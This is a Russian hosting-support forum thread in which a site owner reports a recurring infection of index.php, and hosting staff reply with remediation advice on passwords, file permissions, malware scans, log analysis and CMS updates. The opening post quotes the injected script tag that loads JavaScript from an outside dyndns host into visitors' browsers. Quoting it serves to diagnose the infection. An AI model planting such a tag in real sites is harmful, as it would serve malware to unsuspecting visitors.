Заражен index.php

Вопросы о том как и что сделать чтобы работало
Правила форума
1. Один вопрос - одна тема. Не надо задавать в той же теме другие вопросы.
2. Не пишите в чужих темах, если ваша проблема не имеет отношения к обсуждаемой.
3. Давайте полное описание проблемы - имя сайта, имя сервера, учётная запись, способ воспроизведения, скриншот ошибки.
4. Пароли выкладывать в форум - НЕ НАДО
Антон

Заражен index.php

Сообщение Антон » 2018-03-20, 9:09:09

В конец файла \index.php после тега </html> периодически кто-то пишет код вида

Код: Выделить всё

<script src="http://statistic.dyndns.org/rss.js"></script>
. При загрузке страницы подгружаются вредоносные java-апплеты и прочие зараженные скрипты. После удаления появляется через неделю снова. Хотелось бы знать, как происходит заражение сайта и какие меры надо предпринять. Спасибо.

Хостинговая компания Host-Food.ru
Хостинг HostFood.ru
 

Услуги нашей хостинговой компании

Хостинг HostFood.ru

Тарифы на хостинг, от 12 рублей: https://www.host-food.ru/tariffs/hosting/
Тарифы на виртуальные сервера (VPS/VDS/KVM), от 189 рублей: https://www.host-food.ru/tariffs/virtualny-server-vps/
Тарифы на выделенные сервера (Dedicated Server), от 1560 рублей: https://www.host-food.ru/tariffs/vydelennyi-server-ds/
Недорогие домены в популярных зонах, от 110 рублей: https://www.host-food.ru/domains/
Часто задаваемые вопросы по хостингу: https://www.host-food.ru/faq/
Вопросы по доменам: https://www.host-food.ru/faq/domains.questions/

Вячеслав Голоков

Заражен index.php

Сообщение Вячеслав Голоков » 2018-03-20, 9:09:09

Здравствуйте.

Смените пароль от заказа хостинга и административной части сайта, выставите права 755 на папки и 640 или 644 на файлы.

Аватара пользователя
lissyara
Site Admin
Сообщения: 5951
Зарегистрирован: 2009-09-19, 22:04:41

Заражен index.php

Сообщение lissyara » 2018-03-20, 9:36:05

Самые частые причины: простые пароли, вирусы на вашем компьютере, уязвимости(дыры) в движке сайта.
Для устранения причины и недопущения повторения подобной ситуации, настоятельно рекомендуем:

- изменить на сложные, пароли доступа к хостингу по протоколам FTP и SSH в панели управления хостингом
- проверить компьютеры, с которых осуществлялось администрирование сайтов на хостинге на наличие вредоносных программ (несколькими антивирусами и вручную)
- проанализировать логи доступа к сайту по протоколу HTTP на наличие запросов к уязвимым скриптам сайта, либо нестандартных POST-запросов, с помощью которых мог быть осуществлён взлом
- проверить наличие посторонних файлов на Вашей услуге хостинга, а также наличие вредоносного кода в файлах сайтов и удалить их
- проверить каталоги для временных файлов (/tmp) на хостинге, в них возможна запись данных скриптами
- обновить систему управления сайтом (CMS) до актуальной версии
- на тарифных планах с поддержкой SSH-доступа вместо доступа по протоколу FTP использовать протокол SFTP
- при работе с услугой хостинга не сохранять в программах-клиентах пароли доступа в целях исключения их кражи

Также, рекомендуем проверить не появились ли у вас файлы malvare.*.log в корне аккаунта. В них содержится лог инцидента с указанием проблемных файлов/процессов.
По времени запуска процесса, в логах вашего сайта можно найти какой именно командой/страницей он вызывался, и понять какую уязвимость использовали для заражения.
Убей их всех! Бог потом рассортирует...